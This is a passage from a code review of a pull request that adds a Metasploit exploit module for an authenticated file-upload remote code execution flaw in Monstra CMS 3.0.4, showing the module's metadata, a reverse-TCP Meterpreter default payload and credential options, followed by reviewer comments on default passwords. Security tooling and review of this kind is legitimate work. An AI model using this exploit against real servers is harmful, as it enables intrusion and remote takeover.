modules/exploits/multi/http/monstra_fileupload_exec.rb

```diff
@@ -0,0 +1,184 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Remote::HttpClient
+    include Msf::Exploit::FileDropper
+
+    def initialize(info = {})
+        super(update_info(info,
+            'Name' => 'Monstra CMS - Authenticated  Arbitrary File Upload / Remote Code Execution',
+            'Description' => %q{
+            MonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to a remote command execution on the remote server,
+            an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.
+
+            This module was tested against MonstraCMS 3.0.4.
+        },
+        'Author' =>
+        [
+            'Ishaq Mohammed <shaikhishaq201@gmail.com>', # Discoverys
+            'Touhid M.Shaikh <touhidshaikh22@gmail.com>', # Metasploit Module
+          
+        ],
+        'License' => MSF_LICENSE,
+        'References' =>
+        [
+            ['CVE','2017-18048'],
+            ['EDB','43348'],
+            ['URL','https://blogs.securiteam.com/index.php/archives/3559'],
+            ['URL','https://securityprince.blogspot.com/2017/12/monstra-cms-304-arbitrary-file-upload.html?m=1'],
+            ['URL','https://www.youtube.com/watch?v=-ziZ6DELbzw']
+        ],
+       'DefaultOptions' =>
+          {
+            'SSL'     => false,
+            'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+            'Encoder' => 'php/base64'
+          },
+        'Privileged' => false,
+        'Platform'   => ['php'],
+        'Arch'       => ARCH_PHP,
+        'Targets' =>
+        [
+          ['Monstra CMS 3.0.4', { }],
+        ],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Dec 18 2017'))
+
+        register_options(
+        [
+          OptString.new('TARGETURI', [ true, "Base Monstra CMS directory path", '/']),
+          OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
+          OptString.new('PASSWORD', [ true, "Password to authenticate with", 'password'])
```

Comment:
Is this the default password?

Reply:
Noo... during setup u can set anything ....

Reply:
It's best to set `''` as the default if the application does not have a default.